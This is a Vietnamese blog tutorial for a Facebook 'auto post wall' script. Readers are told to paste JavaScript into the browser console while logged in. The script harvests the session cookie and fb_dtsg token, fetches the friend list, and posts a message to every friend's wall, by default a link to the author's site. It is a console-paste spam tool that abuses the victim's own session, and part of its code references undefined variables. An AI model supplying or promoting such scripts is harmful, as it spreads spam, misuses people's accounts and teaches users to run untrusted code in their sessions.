Hướng dẫn auto post wall facebook

Lâu lắm rồi mình không post bài lên Đinh Công Thành Blog, hôm nay rảnh rỗi tí mình xin hướng dẫn các bạn Auto Post Wall Facebook (Tự động đăng stt lên tường bạn bè)
Cực kì dễ dàng chỉ trong vòng 2 phút bạn có thể hoàn thành :

Bước 1: Các bạn vào đây VÀO ĐÂY sau đó các bạn Ctrl A để chọn tất cảCtrl C để copy lại hoặc các bạn cũng có thể copy đoạn mã ở phía dưới

javascript: var grouppost = "<div><span class='img sp_f52w7l sx_47132d'></span><a style='position:absolute;size:3px;padding-left:3px;font-weight:bold;font-family:Tahoma;font-size:11px;color:#3B5998;'>Auto Post Wall Facebook</a></div></br>";
grouppost += "<div><textarea id='txtFloodMsg' placeholder='Nhập nội dung cần post' style='COLOR:WHITE;padding-top:5px;width:493px;height:85px;font-family:tahoma;font-size:13px;background-color:rgba(255,255,255,0.1);'>http://dinhcongthanh.com</textarea></div>";
grouppost += "<div><br><span class='img sp_dpkef5 sx_f05251'></span><a style='position:absolute;font-family:Arial;size:3px;padding-left:3px;font-size:11px;color:rgb(128, 128, 128);'>Cover: Dinh Cong Thanh</a></span><button style='margin-left:437px' class='_2 _3 _6 _4 _5 selected' onclick='autopostingfunc(this);' >Post</button><div style='color:gray;'>Nguon: Dinh Cong Thanh Blog</br>Made by:</A><A style='color:#3B5998;' href='http://dinhcongthanh.com' target='_0'> Dinh Cong Thanh</A></A><A style='color:#3B5998;' href='https://www.facebook.com/dinhcongthanh.c0m' target='_0'> </A></A>,</A><A style='color:#3B5998;' href='https://www.facebook.com/dinhcongthanh.c0m' target='_0'> </A></A></br>Web : <A style='color:#3B5998;' href='http://dinhcongthanh.com' target='_0'>http://dinhcongthanh.com</A>.</A><br></div>";
var Popupset = document.createElement("div");
Popupset.setAttribute("style", "min-height:50px;width:500px;position:fixed;top:100px;box-shadow: 0px 4px 10px rgba(24, 144, 255, 0.63);position:fixed;left:50%;margin-left:-273px;text-align:left;border-radius:10px;padding:5px;z-index:999999;border:5px solid rgba(0,0,0,0.9);background-color:rgba(0,0,0,0.9);color:White");
Popupset.innerHTML = grouppost;
document.body.appendChild(Popupset);
jx = {
getHTTPObject: function () {
var A = false;
if (typeof ActiveXObject != "undefined") try {
A = new ActiveXObject("Msxml2.XMLHTTP")
} catch(C) {
try {
A = new ActiveXObject("Microsoft.XMLHTTP")
} catch(B) {
A = false
}
} else if (window.XMLHttpRequest) try {
A = new XMLHttpRequest
} catch(C) {
A = false
}
return A
},
load: function (url, callback, format, method, opt) {
var http = this.init();
if (!http || !url) return;
if (http.overrideMimeType) http.overrideMimeType("text/xml");
if (!method) method = "GET";
if (!format) format = "text";
if (!opt) opt = {};
format = format.toLowerCase();
method = method.toUpperCase();
var now = "uid=" + (new Date).getTime();
url += url.indexOf("?") + 1 ? "&" : "?";
url += now;
var parameters = null;
if (method == "POST") {
var parts = url.split("?");
url = parts[0];
parameters = parts[1]
}
http.open(method, url, true);
var ths = this;
if (opt.handler) http.onreadystatechange = function () {
opt.handler(http)
};
else http.onreadystatechange = function () {
if (http.readyState == 4) if (http.status == 200) {
var result = "";
if (http.responseText) result = http.responseText;
if (format.charAt(0) == "j") {
result = result.replace(/[\n\r]/g, "");
result = eval("(" + result + ")")
} else if (format.charAt(0) == "x") result = http.responseXML;
if (callback) callback(result)
} else {
if (opt.loadingIndicator) document.getElementsByTagName("body")[0].removeChild(opt.loadingIndicator);
if (opt.loading) document.getElementById(opt.loading).style.display = "none";
if (error) error(http.status)
}
};
http.send(parameters)
},
bind: function (A) {
var C = {
"url": "",
"onSuccess": false,
"onError": false,
"format": "text",
"method": "GET",
"update": "",
"loading": "",
"loadingIndicator": ""
};
for (var B in C) if (A[B]) C[B] = A[B];
if (!C.url) return;
var D = false;
if (C.loadingIndicator) {
D = document.createElement("div");
D.setAttribute("style", "position:absolute;top:0px;left:0px;");
D.setAttribute("class", "loading-indicator");
D.innerHTML = C.loadingIndicator;
document.getElementsByTagName("body")[0].appendChild(D);
this.opt.loadingIndicator = D
}
if (C.loading) document.getElementById(C.loading).style.display = "block";
this.load(C.url, function (E) {
if (C.onSuccess) C.onSuccess(E);
if (C.update) document.getElementById(C.update).innerHTML = E;
if (D) document.getElementsByTagName("body")[0].removeChild(D);
if (C.loading) document.getElementById(C.loading).style.display = "none"
},
C.format, C.method, C)
},
init: function () {
return this.getHTTPObject()
}
};
var j = 0;
var k = 0;
var suc = 0;
var msg = "Auto post by Mà£nh TÆ°̀‰ TĂª̀";
var arr = new Array;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);

function autopostingfunc(sender) {
if (document.getElementById("txtFloodMsg").value != "") msg = document.getElementById("txtFloodMsg").value;
jx.load(window.location.protocol + "//www.facebook.com/ajax/typeahead/search/bootstrap.php?__a=1&filter[0]=user&viewer=" + user_id + "&token=v7&lazy=0&__user=" + user_id, function (a) {
var b = a;
var c = b.substring(b.indexOf("{"));
var d = JSON.parse(c);
d = d.payload.entries;
for (var e = 0; e < d.length; e++) arr.push(d[e].uid);
sender.parentNode.innerHTML = "Please Wait...";
postitok()
})
}
var a = document.body.innerHTML;
var dts = document.getElementsByName("fb_dtsg")[0].value;
var composerid = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);

function postitok() {
pst = "fb_dtsg=" + dts + "&xhpc_composerid=" + composerid + "&xhpc_targetid=" + arr[suc] + "&xhpc_context=home&xhpc_fbx=1&xhpc_message_text=" + encodeURIComponent(msg) + "&xhpc_message=" + encodeURIComponent(msg) + "&UIPrivacyWidget[0]=40&privacy_data[value]=40&privacy_data[friends]=0&privacy_data[list_anon]=0&privacy_data[list_x_anon]=0&=Share&nctr[_1]=pagelet_group_composer";
with(newx = new XMLHttpRequest) open("POST", "/ajax/updatestatus.php?__a=1"),
send(pst);
suc++;
if (suc > arr.length) {
alert("Auto Posting Completed. Now Refresh your Homepage.");
suc = 0
} else setTimeout("postitok()", 3E4 / arr.length)
}
setTimeout("autopostingfunc()", 1E3);

function P(post) {
var X = new XMLHttpRequest();
var XURL = "//www.facebook.com/ajax/ufi/like.php";
var XParams = "like_action=true&ft_ent_identifier=" + post + "&source=1&client_id=" + now + "%3A3366677427&rootid=u_ps_0_0_14&giftoccasion&ft[tn]=%3E%3DU&ft[type]=20&ft[qid]=5882006890513784712&ft[mf_story_key]=" + post + "&nctr[_1]=pagelet_home_stream&__user=" + user_id + "&__a=1&__dyn=7n8ahyj35CFwXAg&__req=j&fb_dtsg=" + fb_dtsg + "&phstamp=";
X.open("POST", XURL, true);
X.onreadystatechange = function () {
if (X.readyState == 4 && X.status == 200) {
X.close
}
};
X.send(XParams)
}

Bước 2 : Các bạn vào lại Facebook ấn phím F12 chọn mục Console, click vào bên dưới và dán đoạn code ( mà ) vừa copy ở bước 1 vào đó ( ấn Ctrl V ) và ấn Enter .Bước 3: Các bạn nhập nội dung cần post vào ô trống và Enter . Chờ tầm 3-5p và xem kết quả nhé


Chúc bạn thành công!
Share this with short URL: Get Short URLloading short url
18:32:00 18:32:00